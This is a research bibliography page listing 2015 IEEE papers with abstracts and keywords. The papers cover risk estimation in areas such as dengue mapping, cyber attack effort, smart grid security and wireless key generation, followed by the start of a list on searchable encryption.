Abstract: This study presents spatial analysis of Dengue Fever (DF) outbreak using Geographic Information System (GIS) in the state of Selangor, Malaysia. DF is an Aedes mosquito-borne disease. The aim of the study is to map the spread of DF outbreak in Selangor by producing a risk map while the objective is to identify high risk areas of DF by producing a risk map using GIS tools. The data used was DF dengue cases in 2012 obtained from Ministry of Health, Malaysia. The analysis was carried out using Moran's I, Average Nearest Neighbor (ANN), Kernel Density Estimation (KDE) and buffer analysis using GIS. From the Moran's I analysis, the distribution pattern of DF in Selangor clustered. From the ANN analysis, the result shows a dispersed pattern where the ratio is more than 1. The third analysis was based on KDE to locate the hot spot location. The result shows that some districts are classified as high risk areas which are Ampang, Damansara, Kapar, Kajang, Klang, Semenyih, Sungai Buloh and Petaling. The buffer analysis, area ranges between 200m. to 500m. above sea level shows a clustered pattern where the highest frequent cases in the year are at the same location. It was proven that the analysis based on the spatial statistic, spatial interpolation, and buffer analysis can be used as a method in controlling and locating the DF affection with the aid of GIS.

Keywords: data analysis; diseases; estimation theory; geographic information systems; pattern classification; risk analysis; ANN; Aedes mosquito-borne disease; GIS; KDE; average nearest neighbor; buffer analysis; dengue fever outbreak distribution; geographical information system; kernel density estimation; risk map; spatial statistics; Artificial neural networks; Diseases; Estimation; Geographic information systems; Kernel; Rivers; Urban areas (ID#: 16-9306)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371016&isnumber=7370954

 

Llanso, T.; Dwivedi, A.; Smeltzer, M., "An Approach for Estimating Cyber Attack Level of Effort," in Systems Conference (SysCon), 2015 9th Annual IEEE International, pp. 14-19, 13-16 April 2015

doi: 10.1109/SYSCON.2015.7116722

Abstract: Timely risk assessments allow organizations to gauge the degree to which cyber attacks threaten their mission/business objectives. Risk plots in such assessments typically include cyber attack likelihood values along with the impact. This paper describes an algorithm and an associated model that allow for estimation of one aspect of cyber attack likelihood, attack level of effort. The approach involves the use of an ordinal set of standardized attacker tiers, associated attacker capabilities, and protections (security controls) required to resist those capabilities.

Keywords: business data processing; organisational aspects; risk management; security of data; attacker capability; business objective; cyber attack likelihood value; mission objective; organizations; risk assessment; security control; standardized attacker tier; Context; NIST; Risk management; Security; Unified modeling language; Attack; Cyber; Level of Effort; Risk (ID#: 16-9307)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116722&isnumber=7116715

 

Darimont, R.; Ponsard, C., "Supporting Quantitative Assessment of Requirements in Goal Orientation," in Requirements Engineering Conference (RE), 2015 IEEE 23rd International, pp. 290-291, 24-28 Aug. 2015. doi: 10.1109/RE.2015.7320443

Abstract: Goal-Orientation provides a rich framework for reasoning about systems during the Requirements Engineering (RE) phase. While critical properties like safety or security can require formal semantics, performing quantitative reasoning on semi-formal models in a much more lightweight approach reveals to be sufficient in many projects. Most of the time, existing RE tools only target specific quantification scenarios or do not provide easy mechanisms for implementing them. In order to demonstrate the ability to provide mechanisms that are both generic and powerful, we developed an extension of the Objectiver tool in three directions: (1) internal reasoning capabilities on AND-OR goal/obstacles structures, (2) close integration with an external spreadsheet application and (3) model export for building assessment tools using model-driven engineering techniques. We also demonstrate how our approach can cope with a variety of industrial scenarios requiring some form of quantification such as risk analysis, selection of design alternatives, effort estimation, and assessment of customer satisfaction.

keywords: formal specification; systems analysis; AND-OR goal-obstacles structures; RE phase; external spreadsheet application; formal semantics; goal orientation; model-driven engineering techniques; objectiver tool; requirements engineering; requirements quantitative assessment; semiformal models; Analytical models; Cognition; Estimation; Requirements engineering; Safety; Statistical analysis; Unified modeling language (ID#: 16-9308)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7320443&isnumber=7320393

 

Wenxia Liu; He Li; Huiting Xu; Jianhua Zhang; Dehua Zheng, "Transmission Expansion Planning Based on Hybrid EDA/DE Algorithm Considering Wind Power Penetration," in PowerTech, 2015 IEEE Eindhoven, pp. 1-6, June 29 2015-July 2 2015. doi: 10.1109/PTC.2015.7232538

Abstract: It poses high requirements for the calculation speed and the precision of the solving method when we consider the large-scale transmission expansion planning (TEP) problems. Therefore, combined with the respective characteristics of EDA (Distribution of Estimation Algorithm) and DE (Differential Evolution algorithm), this paper puts forward a new hybrid EDA/DE algorithm for large-scale TEP problems. Meanwhile, it improves the updating mechanism of probabilistic model of EDA based on the characteristics of the TEP problems. Considering the investments of grid company, the new energy incentive politics and network security constraints, this paper proposes a multi-objective static planning model for the TEP considering wind power penetration, which takes the comprehensive cost, the wind curtailment and the risk value into consideration. Finally, a specific example is applied in this paper to verify the applicability and effectiveness of the proposed model and algorithm.

Keywords: evolutionary computation; investment; power transmission economics; power transmission planning; wind power plants; differential evolution algorithm; distribution of estimation algorithm; energy incentive politics; grid company investments; hybrid EDA/DE algorithm; multiobjective static planning model; network security constraints; transmission expansion planning; wind power penetration; Analytical models; Computational modeling; Generators; Probabilistic logic; Differential Evolution; Estimation of Distribution Algorithm; Transmission Expansion Planning; Wind Power Penetration (ID#: 16-9309)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232538&isnumber=7232233

 

Chessa, M.; Grossklags, J.; Loiseau, P., "A Game-Theoretic Study on Non-monetary Incentives in Data Analytics Projects with Privacy Implications," in Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 90-104, 13-17 July 2015. doi: 10.1109/CSF.2015.14

Abstract: The amount of personal information contributed by individuals to digital repositories such as social network sites has grown substantially. The existence of this data offers unprecedented opportunities for data analytics research in various domains of societal importance including medicine and public policy. The results of these analyses can be considered a public good which benefits data contributors as well as individuals who are not making their data available. At the same time, the release of personal information carries perceived and actual privacy risks to the contributors. Our research addresses this problem area. In our work, we study a game-theoretic model in which individuals take control over participation in data analytics projects in two ways: 1) individuals can contribute data at a self-chosen level of precision, and 2) individuals can decide whether they want to contribute at all (or not). From the analyst's perspective, we investigate to which degree the research analyst has flexibility to set requirements for data precision, so that individuals are still willing to contribute to the project, and the quality of the estimation improves. We study this tradeoffs scenario for populations of homogeneous and heterogeneous individuals, and determine Nash equilibrium that reflect the optimal level of participation and precision of contributions. We further prove that the analyst can substantially increase the accuracy of the analysis by imposing a lower bound on the precision of the data that users can reveal.

Keywords: data analysis; data privacy; game theory; incentive schemes; social networking (online); Nash equilibrium; data analytics; digital repositories; game theoretic study; nonmonetary incentives; personal information; privacy implications; social network sites; Data privacy; Estimation; Games; Noise; Privacy; Sociology; Statistics; Non-cooperative game; data analytics; non-monetary incentives; population estimate; privacy; public good (ID#: 16-9310)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243727&isnumber=7243713

 

Orojloo, H.; Azgomi, M.A., "Evaluating the Complexity and Impacts of Attacks on Cyber-Physical Systems," in Real-Time and Embedded Systems and Technologies (RTEST), 2015 CSI Symposium on, pp. 1-8, 7-8 Oct. 2015. doi: 10.1109/RTEST.2015.7369840

Abstract: In this paper, a new method for quantitative evaluation of the security of cyber-physical systems (CPSs) is proposed. The proposed method models the different classes of adversarial attacks against CPSs, including cross-domain attacks, i.e., cyber-to-cyber and cyber-to-physical attacks. It also takes the secondary consequences of attacks on CPSs into consideration. The intrusion process of attackers has been modeled using attack graph and the consequence estimation process of the attack has been investigated using process model. The security attributes and the special parameters involved in the security analysis of CPSs, have been identified and considered. The quantitative evaluation has been done using the probability of attacks, time-to-shutdown of the system and security risks. The validation phase of the proposed model is performed as a case study by applying it to a boiling water power plant and estimating the suitable security measures.

Keywords: cyber-physical systems; estimation theory; graph theory; probability; security of data; CPS; attack graph; attack probability; consequence estimation process; cross-domain attack; cyber-physical system security; cyber-to-cyber attack; cyber-to-physical attack; security attributes; security risks; time-to-shutdown; Actuators; Computer crime; Cyber-physical systems; Process control; Sensor phenomena and characterization; Cyber-physical systems; attack consequences; modeling; quantitative security evaluation (ID#: 16-9311)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7369840&isnumber=7369836

 

Sahnoune, Z.; Aimeur, E.; El Haddad, G.; Sokoudjou, R., "Watch Your Mobile Payment: An Empirical Study of Privacy Disclosure," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 934-941, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.467

Abstract: Using a smartphone as payment device has become a highly attractive feature that is increasingly influencing user acceptance. Electronic wallets, near field communication, and mobile shopping applications, are all incentives that push users to adopt m-payment. Hence, this makes the sensitive data that already exists on everyone's smartphone easily collated to their financial transaction details. In fact, misusing m-payment can be a real privacy threat. The existing privacy issues regarding m-payment are already numerous, and can be caused by different factors. We investigate, through an empirical survey-based study, the different factors and their potential correlations and regression values. We identify three factors that influence directly privacy disclosure: the user's privacy concerns, his risk perception, and the protection measure appropriateness. These factors are impacted by indirect ones, which are linked to the users' and the technology's characteristics, and the behaviour of institutions and companies. In order to analyse the impact of each factor, we define a new research model for privacy disclosure based on several hypotheses. The study is mainly based on a five-item scale survey, and on the modelling of structural equations. In addition to the impact estimations for each factor, our study results indicate that the privacy disclosure in m-payment is primarily caused by the "protection measure appropriateness", which, in its turn, impacted by "the m-payment convenience". We discuss in this paper the research model, the methodology, the findings and their significance.

Keywords: Internet; data privacy; human factors; mobile commerce; near-field communication; regression analysis; risk analysis; smart phones; electronic wallets; financial transaction details; m-payment; mobile payments; mobile shopping applications; near field communication; payment device; privacy disclosure; privacy threat; regression values; risk perception; smartphone; structural equation modelling; technology characteristics; user acceptance; user privacy concerns; Context; Data privacy; Mobile communication; Mobile handsets; Privacy; Security; Software; m-payment; privacy concerns; privacy disclosure; privacy perception; privacy policies; structural equation modeling (ID#: 16-9312)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345375&isnumber=7345233

 

Chi-Ping Lin; Chuen-Fa Ni; I-Hsian Li; Chih-Heng Lu, "Stochastic Delineation of Well Capture Zones in Aquifers of Choushui River Alluvial Fan in Central Taiwan," in Security Technology (ICCST), 2015 International Carnahan Conference on, pp. 427-432, 21-24 Sept. 2015. doi: 10.1109/CCST.2015.7389722

Abstract: The delineation of well capture zones is of great importance to accurately define well head protection area (WHPA) for potential groundwater resources and the public security. Natural aquifer systems typically involve different extent of heterogeneity in aquifer parameters and such parameter variations can directly influence the estimations of flow fields and the delineations of WHPAs. This study employs an unconditional approximate spectral method (ASM) associated with backward particle tracking algorithm to delineate stochastic well capture zones in aquifers of Choushui River alluvial fan (CRAF) in central Taiwan. The analysis integrates hourly-recorded groundwater observations from 1995 to 2013 to be the mean flow field. We implement the developed model to 187 Taiwan Water Corporation (TWC) wells for domestic water supplies in CRAF. With predefined small-scale heterogeneity for hydraulic conductivity, the uncertainty of capture zones are obtained based on the observed pumping rates at TWC wells. Results of the analyses show that the average distances of mean capture zones in the first layer of CRAF are about one kilometer from the TWC wells. The small-scale hydraulic conductivity can induce capture zone uncertainties ranging from meters to tens of meters in one year depending on the complexity of the flow field. The uncertainty zones of WHPA in CRAF can be served as the basis to conduct risk analysis for drinking water.

Keywords: groundwater; rivers; water supply; AD 1995 to 2013; Choushui river alluvial fan; Taiwan water corporation; WHPA delineation; approximate spectral method; aquifer parameter; aquifer system; backward particle tracking algorithm; central Taiwan; domestic water supply; drinking water; groundwater observation; groundwater resource; hydraulic conductivity; well capture zone stochastic delineation; well head protection area; Bandwidth; Geology; Monitoring; Rivers; Stochastic processes ;Uncertainty; Water pollution; Choushui River alluvial fan; approximate spectral method; capture zone; heterogeneity (ID#: 16-9313)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389722&isnumber=7389647

 

Junqing Zhang; Woods, R.; Marshall, A.; Duong, T.Q., "An Effective Key Generation System using Improved Channel Reciprocity," in Acoustics, Speech and Signal Processing (ICASSP), 2015 IEEE International Conference on, pp. 1727-1731, 19-24 April 2015. doi: 10.1109/ICASSP.2015.7178266

Abstract: In physical layer security systems there is a clear need to exploit the radio link characteristics to automatically generate an encryption key between two end points. The success of the key generation depends on the channel reciprocity, which is impacted by the non-simultaneous measurements and the white nature of the noise. In this paper, an OFDM subcarriers' channel responses based key generation system with enhanced channel reciprocity is proposed. By theoretically modelling the OFDM subcarriers' channel responses, the channel reciprocity is modelled and analyzed. A low pass filter is accordingly designed to improve the channel reciprocity by suppressing the noise. This feature is essential in low SNR environments in order to reduce the risk of the failure of the information reconciliation phase during key generation. The simulation results show that the low pass filter improves the channel reciprocity, decreases the key disagreement, and effectively increases the success of the key generation.

Keywords: OFDM modulation; cryptography; interference suppression; low-pass filters; radiofrequency interference; risk management; telecommunication network reliability; telecommunication security; wireless channels; OFDM subcarriers channel responses based key generation system; automatic encryption key generation; channel reciprocity improvement; failure risk reduction; information reconciliation phase; low pass filter; noise suppression; nonsimultaneous measurements; physical layer security systems; wireless channel; Analytical models; Channel estimation; Mathematical model; OFDM; Security; Signal to noise ratio; Physical layer security; channel reciprocity; key disagreement; key generation; low pass filter (ID#: 16-9314)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7178266&isnumber=7177909

 

Sen, A.; Madria, S., "A Risk Assessment Framework for Wireless Sensor Networks in a Sensor Cloud," in Mobile Data Management (MDM), 2015 16th IEEE International Conference on, vol. 2, pp. 38-41, 15-18 June 2015. doi: 10.1109/MDM.2015.52

Abstract: A Sensor cloud framework is composed of various heterogeneous wireless sensor networks (WSNs) integrated with the cloud platform. Integration with the cloud platform, in addition to the inherent resource and power constrained nature of the sensor nodes makes these WSNs belonging to a sensor cloud susceptible to security attacks. As such there is a need to formulate effective and efficient security measures for such an environment. But in doing so, requires an understanding of the likelihood and impact of different attacks feasible on the WSNs. In this paper, we propose a risk assessment framework for the WSNs belonging to a sensor cloud. The proposed risk assessment framework addresses the feasible set of attacks on a WSN identifying the relationships between them and thus estimating their likelihood and impact. This kind of assessment will give the security administrator a better perspective of their network and help formulating the required security measures.

Keywords: risk management; telecommunication security; wireless sensor networks; WSN; heterogeneous wireless sensor network; risk assessment framework; security attack; sensor cloud; Bayes methods; Clouds; Degradation; Estimation; Risk management; Security; Wireless sensor networks (ID#: 16-9315)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7264369&isnumber=7264347

 

Gorton, D., "Modeling Fraud Prevention of Online Services Using Incident Response Trees and Value at Risk," in Availability, Reliability and Security (ARES), 2015 10th International Conference on, pp. 149-158, 24-27 Aug. 2015. doi: 10.1109/ARES.2015.17

Abstract: Authorities like the Federal Financial Institutions Examination Council in the US and the European Central Bank in Europe have stepped up their expected minimum security requirements for financial institutions, including the requirements for risk analysis. In a previous article, we introduced a visual tool and a systematic way to estimate the probability of a successful incident response process, which we called an incident response tree (IRT). In this article, we present several scenarios using the IRT which could be used in a risk analysis of online financial services concerning fraud prevention. By minimizing the problem of underreporting, we are able to calculate the conditional probabilities of prevention, detection, and response in the incident response process of a financial institution. We also introduce a quantitative model for estimating expected loss from fraud, and conditional fraud value at risk, which enables a direct comparison of risk among online banking channels in a multi-channel environment.

Keywords: Internet; computer crime; estimation theory; financial data processing; fraud; probability; risk analysis; trees (mathematics); IRT; conditional fraud value; cyber criminal; fraud prevention modelling; incident response tree; online financial service; probability estimation; risk analysis; Europe; Online banking; Probability; Trojan horses (ID#: 16-9316)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299908&isnumber=7299862

 

Collins, K.; Goossens, B., "Cost Effective V&V for Guidance Systems using Enhanced Ground Testing (EGT)," in IEEE AUTOTESTCON, 2015, pp. 244-250, 2-5 Nov. 2015. doi: 10.1109/AUTEST.2015.7356497

Abstract: Strategic missile systems perform an important role in safe guarding our national security. These systems use inertial guidance systems to navigate and control the missile to its intended target. As military budgets shrink, maintaining schedule and cost for the development and sustainment of these complex systems is paramount. Early prototyping combined with ongoing requirements verification in the system development cycle is critical to reduce schedule and cost risks. Verification and Validation programs must verify requirements and instill confidence that the system will perform as intended with minimal flight testing. The Enhanced Ground Testing (EGT) program was developed at Draper Laboratory to address these risks. EGT tests the guidance system in tactically representative environments as a part of system verification and validation. Multiple test cells are used to simulate the missile environments the guidance system will encounter during flight. For Navy MK6 MOD 1 EGT, these test cells consist of an Aircraft F-15E Pod, Centrifuge, and Dynamic Shaker. The test cells support profiles for environmental thermal, vibration / shock, and linear acceleration and provide test data for reliability and accuracy assessments. An EGT program provides design confidence, enables predictive methods for accuracy and reliability degradation, and is a cost effective way to complement flight test programs.

Keywords: aircraft testing; military aircraft; missile guidance; national security; reliability; vibrations; Draper Laboratory; Navy MK6 MOD 1 EGT program; aircraft F-15E pod; cost effective V&V; cost risk reduction; dynamic shaker; enhanced ground testing; environmental thermal; flight test program; guidance system; inertial guidance system; linear acceleration; missile control; missile navigation; national security; reliability assessment; strategic missile system; verification and validation program; Cooling; Degradation; Life estimation; Missiles; Reliability; Testing; Timing; enhanced ground test; strategic guidance system; verification and validation (ID#: 16-9317)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356497&isnumber=7356451

 

Carlini, E.M.; Pecoraro, G.; Tina, G.M.; Quaciari, C., "Risk-Based Probabilistic Approach to Estimate Power System Security in the Sicilian Context," in Clean Electrical Power (ICCEP), 2015 International Conference on, pp. 737-742, 16-18 June 2015. doi: 10.1109/ICCEP.2015.7177573

Abstract: The quality of the transmission service, in Italy, is managed by the TSO. Although the transmission network is meshed, it often happens a disconnection of some users (cabins processing business distributor or customers AT) due to a fault. The Authority issued the well-defined guidelines that regulate payments and premiums which the TSO is subject. The outages may occur due to events occurring at atypical structure of the network, or in areas normally fed in radial mode. To date, in Italy, there is no risk analysis based on probabilistic considerations taken from historical data in: this article presents a platform able to estimate the risk, taking into account the directives of the Authority. By consulting this platform in the planning stage of a unavailability, the TSO will be aware of the risk and it can decide whether to take corrective action and / or preventive actions to reduce it. In addition, the proposed study, is the basis of the probabilistic assessment of the safety of the electrical system.

Keywords: electrical safety; power system management; power system security; power transmission faults; power transmission planning; power transmission reliability; risk analysis; Sicilian context; TSO; electrical system safety; power outage; power system security estimation; risk-based probabilistic approach; transmission network planning; transmission service quality; Gravity; Indexes; Probabilistic logic; Probability; Software; Springs (ID#: 16-9318)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7177573&isnumber=7177533

 

Ankarali, Z.E.; Demir, A.F.; Qaraqe, M.; Abbasi, Q.H.; Serpedin, E.; Arslan, H.; Gitlin, R.D., "Physical Layer Security for Wireless Implantable Medical Devices," in Computer Aided Modelling and Design of Communication Links and Networks (CAMAD), 2015 IEEE 20th International Workshop on, pp. 144-147, 7-9 Sept. 2015. doi: 10.1109/CAMAD.2015.7390497

Abstract: Wireless communications are increasingly important in health-care applications, particularly in those that use implantable medical devices (IMDs). Such systems have many advantages in providing remote healthcare in terms of monitoring, treatment and prediction for critical cases. However, the existence of malicious adversaries, referred to as nodes, which attempt to control implanted devices, constitutes a critical risk for patients. Such adversaries may perform dangerous attacks by sending malicious commands to the IMD, and any weakness in the device authentication mechanism may result in serious problems including death. In this paper we present a physical layer (PHY) authentication technique for IMDs that does not use existing methods of cryptology. In addition to ensuring authentication, the proposed technique also provides advantages in terms of decreasing processing complexity of IMDs and enhances overall communications performance.

Keywords: biomedical communication; biomedical electronics; body area networks; cryptographic protocols; health care; prosthetics; PHY authentication technique; critical case monitoring; critical case prediction; critical case treatment; death; device authentication mechanism; health care applications; nodes; physical layer security; remote healthcare; wireless communications; wireless implantable medical devices; Authentication; Bit error rate; Channel estimation; Jamming; Performance evaluation; Wireless communication; Body area networks; implantable medical devices (IMDs); in-vivo wireless communications; security (ID#: 16-9319)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7390497&isnumber=7390465

 

Langer, L.; Smith, P.; Hutle, M., "Smart Grid Cybersecurity Risk Assessment," in Smart Electric Distribution Systems and Technologies (EDST), 2015 International Symposium on, pp. 475-482, 8-11 Sept. 2015. doi: 10.1109/SEDST.2015.7315255

Abstract: As much as possible, it is important that the smart grid is secure from cyber-attacks. A vital part of ensuring the security of smart grids is to perform a cybersecurity risk assessment that methodically examines the impact and likelihood of cyber-attacks. Based on the outcomes of a risk assessment, security requirements and controls can be determined that inform architectural choices and address the identified risks. Numerous high-level risk assessment methods and frameworks are applicable in this context. A method that was developed specifically for smart grids is the Smart Grid Information Security (SGIS) toolbox, which we applied to a voltage control and power flow optimization smart grid use case. The outcomes of the assessment indicate that physical consequences could occur because of cyber-attacks to information assets. Additionally, we provide reflections on our experiences with the SGIS toolbox, in order to support others in the community when implementing their own risk assessment for the smart grid.

Keywords: control engineering computing; load flow control; power system analysis computing; power system security; risk management; security of data; smart power grids; voltage control; SGIS toolbox; architectural choices; cyber-attacks; information assets; power flow optimization; security requirements; smart grid cybersecurity risk assessment; smart grid information security toolbox; voltage control; Density estimation robust algorithm; Reactive power; Risk management;Security; Smart grids; Voltage control; Voltage measurement; SGIS toolbox; cybersecurity; risk assessment; smart grid (ID#: 16-9320)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7315255&isnumber=7315169

 

Jauhar, S.; Binbin Chen; Temple, W.G.; Xinshu Dong; Kalbarczyk, Z.; Sanders, W.H.; Nicol, D.M., "Model-Based Cybersecurity Assessment with NESCOR Smart Grid Failure Scenarios," in Dependable Computing (PRDC), 2015 IEEE 21st Pacific Rim International Symposium on, pp. 319-324, 18-20 Nov. 2015. doi: 10.1109/PRDC.2015.37

Abstract: The transformation of traditional power systems to smart grids brings significant benefits, but also exposes the grids to various cyber threats. The recent effort led by US National Electric Sector Cybersecurity Organization Resource (NESCOR) Technical Working Group 1 to compile failure scenarios is an important initiative to document typical cybersecurity threats to smart grids. While these scenarios are an invaluable thought-aid, companies still face challenges in systematically and efficiently applying the failure scenarios to assess security risks for their specific infrastructure. In this work, we develop a model-based process for assessing the security risks from NESCOR failure scenarios. We extend our cybersecurity assessment tool, Cyber-SAGE, to support this process, and use it to analyze 25 failure scenarios. Our results show that CyberSAGE can generate precise and structured security argument graphs to quantitatively reason about the risk of each failure scenario. Further, CyberSAGE can significantly reduce the assessment effort by allowing the reuse of models across different failure scenarios, systems, and attacker profiles to perform "what if?" analysis.

Keywords: power system security; security of data; smart power grids; Cyber-SAGE; NESCOR smart grid failure scenarios; model-based cybersecurity assessment; model-based process; security argument graphs; security risks; Companies; Computer security; Density estimation robust algorithm; Risk management; Smart grids; Unified modeling language; NESCOR; Smart grid; cybersecurity (ID#: 16-9321)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371879&isnumber=7371833

 

Shchetinin, D.; Hug, G., "Risk-Constrained AC OPF with Risk Limits on Individual System States," in PowerTech, 2015 IEEE Eindhoven, pp. 1-6, June 29 2015-July 2 2015. doi: 10.1109/PTC.2015.7232330

Abstract: Risk-based security indexes can be used as a constraint in OPF to determine the most economic generation dispatch while ensuring that the risk of power system operation stays below a given value. Existing approaches only limit the total risk, which can result in some system states having significantly higher values of risk compared to others. In this paper, a risk-constrained AC OPF that limits the individual risk of each considered system state is proposed. The resulting optimization problem is solved by a centralized method and iterative algorithm based on locational security impact factors, which quantify the impact of a change of a generator output on the risk of a certain system state. The comparison of these methods in terms of the simulation time and solution accuracy as well as the analysis of limiting the total versus individual risk is presented for the IEEE Reliability Test System.

Keywords: iterative methods; optimisation; power generation dispatch; power generation economics; power system security; power system state estimation; risk analysis; IEEE reliability test system; centralized method; economic generation dispatch; iterative algorithm; locational security impact factor; optimization problem; power system operation risk; power system state; risk constrained AC OPF; risk limit; risk-based security index; Generators; Indexes; Iterative methods; Niobium; Optimization; Power systems; Security; optimization; risk-based security (ID#: 16-9322)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232330&isnumber=7232233

 

Badawy, A.; Khattab, T.; Elfouly, T.; Chiasserini, C.-F.; Mohamed, A.; Trinchero, D., "Channel Secondary Random Process for Robust Secret Key Generation," in Wireless Communications and Mobile Computing Conference (IWCMC), 2015 International, pp. 114-119, 24-28 Aug. 2015. doi: 10.1109/IWCMC.2015.7289067

Abstract: The broadcast nature of wireless communications imposes the risk of information leakage to adversarial users or unauthorized receivers. Therefore, information security between intended users remains a challenging issue. Most of the current physical layer security techniques exploit channel randomness as a common source between two legitimate nodes to extract a secret key. In this paper, we propose a new simple technique to generate the secret key. Specifically, we exploit the estimated channel to generate a secondary random process (SRP) that is common between the two legitimate nodes. We compare the estimated channel gain and phase to a preset threshold. The moving differences between the locations at which the estimated channel gain and phase exceed the threshold are the realization of our SRP. We simulate an orthogonal frequency division multiplexing (OFDM) system and show that our proposed technique provides a drastic improvement in the key bit mismatch rate (BMR) between the legitimate nodes when compared to the techniques that exploit the estimated channel gain or phase directly. In addition to that, the secret key generated through our technique is longer than that generated by conventional techniques.

Keywords: OFDM modulation; channel estimation; phase estimation; private key cryptography; radio receivers; random processes; risk analysis; BMR; OFDM; SRP; adversarial user; channel gain estimation; channel randomness; channel secondary random process; information leakage risk; information security; key bit mismatch rate; legitimate node; orthogonal frequency division multiplexing; phase estimation; physical layer security technique; robust secret key generation; unauthorized receiver; wireless communication; Channel estimation; Entropy; Gain; OFDM; Quantization (signal); Random processes; Signal to noise ratio; Bit mismatch rate; Channel estimation; OFDM systems; Physical layer security; Secret key generation (ID#: 16-9323)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7289067&isnumber=7288920

 

Razzaque, M.A.; Clarke, S., "A Security-Aware Safety Management Framework for IoT-Integrated Bikes," in Internet of Things (WF-IoT), 2015 IEEE 2nd World Forum on, pp. 92-97, 14-16 Dec. 2015. doi: 10.1109/WF-IoT.2015.7389033

Abstract: Bike and vehicle collisions often result in fatality to vulnerable bikers. Use of technologies can protect such vulnerable road users. Next generation smart bikes with sensing, computing and communication capabilities or bikes with bikers' smartphones have the potential to be integrated in an Internet of Things (IoT) environment. Unlike avoidance of inter-vehicle collisions, very limited efforts are made on IoT-integrated bikes and vehicles to avoid bike-vehicle collisions and offer bikers' safety. Moreover, these IoT-integrated bikes and vehicles will create new and different information and cyber security risks that could make existing safety solutions ineffective. To exploit the potential of IoT in an effective way, especially in bikers' safety, this work proposes a security-aware bikers' safety management framework that integrates a misbehavior detection scheme (MDS) and a collision prediction and detection scheme (CPD). The MDS, in particular for vehicles (as vehicles are mainly responsible for most bike-vehicle collisions) provides security-awareness to the framework using in-vehicle security checking and vehicles' mobility-patterns-based misbehavior detection. The MDS also includes in-vehicle driver's behavior monitoring to identify potential misbehaving drivers. The framework's MDS and the CPD relies on the improved versions of some existing solutions. Use cases of the framework demonstrates its potential in providing bikers safety.

Keywords: Internet of Things; bicycles; mobility management (mobile radio);road safety; smart phones; telecommunication security; CPD scheme; Internet of Things environment; IoT environment; IoT-integrated bikes; MDS; behavior monitoring; bike collisions; bike-vehicle collisions; collision prediction and detection scheme; cyber security risks; in-vehicle security checking; information risks; mobility-patterns-based misbehavior detection; next generation smart bikes; security-aware bikers safety management framework; security-awareness; smartphones; vulnerable road users; Cloud computing; Estimation; Roads; Security; Trajectory; Vehicles; Bikers' Safety; Bikes; Collision Prediction and Detection; Security; V2X communication (ID#: 16-9324)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389033&isnumber=7389012


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Searchable Encryption 2015

 

 
SoS Logo

Searchable Encryption 2015

 

Searchable encryption allows one to store encrypted data externally, but still allow for easy data searches that do not require the search to download everything before decrypting and to allow others to search data without having access to plaintext.  As an application, it is becoming increasingly important in the Cloud environment.  For the Science of Security community, it is an area of research related to cryptography, resilience, and composability. Research cited here was presented in 2015.


Mingchu Li; Wei Jia; Cheng Guo; Weifeng Sun; Xing Tan, "LPSSE: Lightweight Phrase Search with Symmetric Searchable Encryption in Cloud Storage," in Information Technology - New Generations (ITNG), 2015 12th International Conference on, pp. 174-178, 13-15 April 2015. doi: 10.1109/ITNG.2015.33

Abstract: Security of cloud storage has drawn more and more concerns. In the searchable encryption, many previous solutions can let people retrieve the documents containing single keyword or conjunctive keywords by storing encrypted documents with data indexes. However, searching documents with a phrase or consecutive keywords is still a remained open problem. In this paper, using the relative positions, we propose an efficient scheme LPSSE with symmetric searchable encryption that can support encrypted phrase searches in cloud storage. Our scheme is based on non-adaptive security definition by R. Curtmola and with lower costs of transmission and storage than existing systems. Furthermore, we combine some components of currently efficient search engines and our functions to complete a prototype. The experiment results also show that our scheme LPSSE is available and efficient.

Keywords: cloud computing; cryptography; storage management; LPSSE scheme; cloud storage security; data indexes; document retrieval; encrypted document storage; lightweight phrase search with symmetric searchable encryption; nonadaptive security; search engines; Arrays; Cloud computing; Encryption; Indexes; Servers; Cloud storage; Lightweight searchable encryption scheme; Phrase search; Searchable encryption; Symmetry (ID#: 16-9131)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113468&isnumber=7113432

 

Jun Yang; Chuan Fu; Nan Shen; Zheli Liu; Chunfu Jia; Jin Li, "General Multi-key Searchable Encryption," in Advanced Information Networking and Applications Workshops (WAINA), 2015 IEEE 29th International Conference on, pp. 89-95, 24-27 March 2015. doi: 10.1109/WAINA.2015.18

Abstract: We analysis outsourced server with multi-users and classify the data sharing into two main types. We focus on the data sharing between users in Searchable Encryption and the corresponding security goal. Then we present a general scheme for Searchable Encryption in which the cipher text can be generated from parameter by authorized users. With the concept of homomorphism and one-way function, we construct a general model to illustrate and fulfill the goals involved. We also promote such a model to a general Multi-Key Searchable Encryption which enables only a single submission for the retrievals in the documents encrypted by different keys. We also give two concrete examples to illustrate the feasibility and security in such a general model.

